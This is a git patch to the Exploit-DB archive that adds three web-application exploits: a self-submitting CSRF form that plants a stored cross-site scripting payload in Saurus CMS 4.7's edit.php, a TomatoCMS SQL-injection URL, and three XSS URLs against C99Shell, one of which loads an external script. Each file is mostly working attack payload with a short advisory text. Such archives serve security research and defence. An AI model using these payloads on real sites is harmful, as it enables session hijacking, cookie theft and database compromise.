From b9612611d3070a6032daf541e4f121810ccbcf87 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 7 Jul 2014 04:40:19 +0000
Subject: [PATCH] Updated 07_07_2014

---
 files.csv                        |  3 +++
 platforms/php/webapps/33976.html | 44 ++++++++++++++++++++++++++++++++
 platforms/php/webapps/33978.txt  |  9 +++++++
 platforms/php/webapps/33979.txt  | 13 ++++++++++
 4 files changed, 69 insertions(+)
 create mode 100755 platforms/php/webapps/33976.html
 create mode 100755 platforms/php/webapps/33978.txt
 create mode 100755 platforms/php/webapps/33979.txt

diff --git a/files.csv b/files.csv
index 75b16132f..df84de903 100755
--- a/files.csv
+++ b/files.csv
@@ -30597,3 +30597,6 @@ id,file,description,date,author,platform,type,port
 33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 '.asx' File Remote Denial of Service Vulnerability",2010-05-10,"Steve James",windows,dos,0
 33974,platforms/windows/remote/33974.txt,"Mereo 1.9.1 Directory Traversal Vulnerability",2010-05-09,"John Leitch",windows,remote,0
 33975,platforms/php/webapps/33975.html,"Affiliate Store Builder 'edit_cms.php' Multiple SQL Injection Vulnerabilities",2010-05-11,"High-Tech Bridge SA",php,webapps,0
+33976,platforms/php/webapps/33976.html,"Saurus CMS 4.7 'edit.php' Cross Site Scripting Vulnerability",2010-05-11,"High-Tech Bridge SA",php,webapps,0
+33978,platforms/php/webapps/33978.txt,"TomatoCMS 2.0.x SQL Injection Vulnerability",2010-05-12,"Russ McRee",php,webapps,0
+33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 pre-release buil 'Ch99.php' Cross Site Scripting Vulnerability",2010-05-19,indoushka,php,webapps,0
diff --git a/platforms/php/webapps/33976.html b/platforms/php/webapps/33976.html
new file mode 100755
index 000000000..baef80261
--- /dev/null
+++ b/platforms/php/webapps/33976.html
@@ -0,0 +1,44 @@
+source: http://www.securityfocus.com/bid/40059/info
+
+Saurus CMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Saurus CMS 4.7.0 Community Edition is vulnerable; other versions may also be affected. 
+
+<form action="http://www.example.com/admin/edit.php" name="editForm" method="POST" enctype="multipart/form-data">
+<input type="hidden" name="tab" value="object" />
+<input type="hidden" name="op" value="new" />
+<input type="hidden" name="op2" value="" />
+<input type="hidden" name="refresh" value="0" />
+<input type="hidden" name="tyyp_id" value="1" />
+<input type="hidden" name="tyyp" value="rubriik" />
+<input type="hidden" name="pearubriik" value="0" />
+<input type="hidden" name="id" value="27746" />
+<input type="hidden" name="parent_id" value="27270" />
+<input type="hidden" name="previous_id" value="" />
+<input type="hidden" name="keel" value="1" />
+<input type="hidden" name="on_pealkiri" value="1" />
+<input type="hidden" name="sorting" value="">
+<input type="hidden" name="extension_path" value="" />
+<input type="hidden" name="opener_location" value="" />
+<input type="hidden" name="publish" value="1" />
+<input name="permanent_parent_id" type="hidden" value="27270" />
+<input name="sys_alias" type="hidden" value="" />
+<input name="advanced_panel_state" type="hidden" value="0" />
+<input type="hidden" name="pealkiri" value='"><script>alert(document.cookie)</script>' />
+<input type="hidden" name="friendly_url" value="scriptalertdocumentcookiescript" />
+<input type="hidden" name="ttyyp_id" value="0" />
+<input type="hidden" name="publish" value="1" />
+<input type="hidden" name="rubriik[]" value="27270">
+<input type="hidden" name="page_ttyyp_id" value="0" />
+<input type="hidden" name="on_meilinglist" value="1" />
+<input type="hidden" name="avaldamise_algus" value="" />
+<input type="hidden" name="avaldamise_lopp" value="" />
+<input type="hidden" name="kesk" value="0" />
+</form>
+<script>
+document.editForm.submit();
+</script>
+
+
diff --git a/platforms/php/webapps/33978.txt b/platforms/php/webapps/33978.txt
new file mode 100755
index 000000000..8d878d6d7
--- /dev/null
+++ b/platforms/php/webapps/33978.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40108/info
+
+TomatoCMS is prone to a SQL-injection vulnerability and multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting these issues may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database or to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
+
+TomatoCMS 2.0.6 and prior are vulnerable. 
+
+http://www.example.com/news/search?q=sdf%22+ANY_SQL_HERE 
\ No newline at end of file
diff --git a/platforms/php/webapps/33979.txt b/platforms/php/webapps/33979.txt
new file mode 100755
index 000000000..c120aa850
--- /dev/null
+++ b/platforms/php/webapps/33979.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/40134/info
+
+C99Shell is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+C99Shell 1.0 pre-release build 16 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/Ch99.php?directory=<iframe/+/onload=alert(213771818860)></iframe>
+
+http://www.example.com/Ch99.php?directory=<ScRiPt+bad=">"+src="http://127.0.0.1/16.js?213771818860"></ScRiPt>
+
+http://www.example.com/Ch99.php?directory=<img+src=http://127.0.0.1/cars.jpg+onload=alert(213771818860)>